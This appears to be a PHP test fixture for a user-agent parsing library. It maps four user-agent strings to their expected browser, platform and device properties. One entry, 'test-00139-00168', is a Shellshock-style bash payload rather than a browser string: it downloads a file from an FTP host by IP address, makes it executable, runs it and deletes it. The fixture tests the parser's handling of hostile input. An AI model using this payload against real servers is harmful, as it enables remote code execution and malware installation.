<?php

return [
    'test-00139-00124' => [
        'ua'         => 'Mozilla/5.0 (Windows NT 6.2; rv:49.0) Gecko/20100101 Firefox/49.0 anonymized by Abelssoft 988959185',
        'properties' => [
            'Browser_Name'            => 'Firefox',
            'Browser_Type'            => 'Browser',
            'Browser_Bits'            => 32,
            'Browser_Maker'           => 'Mozilla Foundation',
            'Browser_Modus'           => 'unknown',
            'Browser_Version'         => '49.0',
            'Platform_Codename'       => 'Windows NT 6.2',
            'Platform_Marketingname'  => 'Windows 8',
            'Platform_Version'        => '0.0.0',
            'Platform_Bits'           => 32,
            'Platform_Maker'          => 'Microsoft Corporation',
            'Platform_Brand_Name'     => 'Microsoft',
            'Device_Name'             => 'Windows Desktop',
            'Device_Maker'            => 'Various',
            'Device_Type'             => 'Desktop',
            'Device_Pointing_Method'  => 'mouse',
            'Device_Dual_Orientation' => true,
            'Device_Code_Name'        => 'Windows Desktop',
            'Device_Brand_Name'       => 'unknown',
            'RenderingEngine_Name'    => 'Gecko',
            'RenderingEngine_Version' => 'unknown',
            'RenderingEngine_Maker'   => 'Mozilla Foundation',
        ],
    ],
    'test-00139-00163' => [
        'ua'         => 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G900F Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/51.0.2704.81 Mobile Safari/537.36 ACHEETAHI/2100502042',
        'properties' => [
            'Browser_Name'            => 'CM Browser',
            'Browser_Type'            => 'Browser',
            'Browser_Bits'            => 32,
            'Browser_Maker'           => 'Cheetah Mobile',
            'Browser_Modus'           => 'unknown',
            'Browser_Version'         => '0.0',
            'Platform_Codename'       => 'Android',
            'Platform_Marketingname'  => 'Android',
            'Platform_Version'        => '6.0.1',
            'Platform_Bits'           => 32,
            'Platform_Maker'          => 'Google Inc',
            'Platform_Brand_Name'     => 'Google',
            'Device_Name'             => 'Galaxy S5 LTE',
            'Device_Maker'            => 'Samsung',
            'Device_Type'             => 'Mobile Phone',
            'Device_Pointing_Method'  => 'touchscreen',
            'Device_Dual_Orientation' => true,
            'Device_Code_Name'        => 'SM-G900F',
            'Device_Brand_Name'       => 'Samsung',
            'RenderingEngine_Name'    => 'Blink',
            'RenderingEngine_Version' => 'unknown',
            'RenderingEngine_Maker'   => 'Google Inc',
        ],
    ],
    'test-00139-00168' => [
        'ua'         => '() { :;}; /bin/bash -c \'wget ftp://ftp:sadjampa2006@212.92.127.127/style.css -O /tmp/pampa;chmod 755 /tmp/pampa;/tmp/pampa;rm /tmp/pampa\'',
        'properties' => [
            'Browser_Name'            => 'Default Browser',
            'Browser_Type'            => 'unknown',
            'Browser_Bits'            => 32,
            'Browser_Maker'           => 'unknown',
            'Browser_Modus'           => 'unknown',
            'Browser_Version'         => '0.0',
            'Platform_Codename'       => 'unknown',
            'Platform_Marketingname'  => 'unknown',
            'Platform_Version'        => '0.0.0',
            'Platform_Bits'           => 32,
            'Platform_Maker'          => 'unknown',
            'Platform_Brand_Name'     => 'unknown',
            'Device_Name'             => 'unknown',
            'Device_Maker'            => 'unknown',
            'Device_Type'             => null,
            'Device_Pointing_Method'  => null,
            'Device_Dual_Orientation' => false,
            'Device_Code_Name'        => 'unknown',
            'Device_Brand_Name'       => 'unknown',
            'RenderingEngine_Name'    => 'unknown',
            'RenderingEngine_Version' => 'unknown',
            'RenderingEngine_Maker'   => 'unknown',
        ],
    ],
    'test-00139-00182' => [
        'ua'         => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 10 Build/MOB30J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.61 Safari/537.36',
        'properties' => [
            'Browser_Name'            => 'Chrome',
            'Browser_Type'            => 'Browser',
            'Browser_Bits'            => 32,
            'Browser_Maker'           => 'Google Inc',
            'Browser_Modus'           => 'unknown',
            'Browser_Version'         => '54',
            'Platform_Codename'       => 'Android',
            'Platform_Marketingname'  => 'Android',
            'Platform_Version'        => '6.0.1',
            'Platform_Bits'           => 32,
            'Platform_Maker'          => 'Google Inc',
            'Platform_Brand_Name'     => 'Google',
            'Device_Name'             => 'Nexus 10',
            'Device_Maker'            => 'Samsung',
            'Device_Type'             => 'Tablet',
            'Device_Pointing_Method'  => 'touchscreen',
            'Device_Dual_Orientation' => true,
            'Device_Code_Name'        => 'Nexus 10',
            'Device_Brand_Name'       => 'Google',
            'RenderingEngine_Name'    => 'Blink',
            'RenderingEngine_Version' => 'unknown',
            'RenderingEngine_Maker'   => 'Google Inc',
        ],
    ],
];
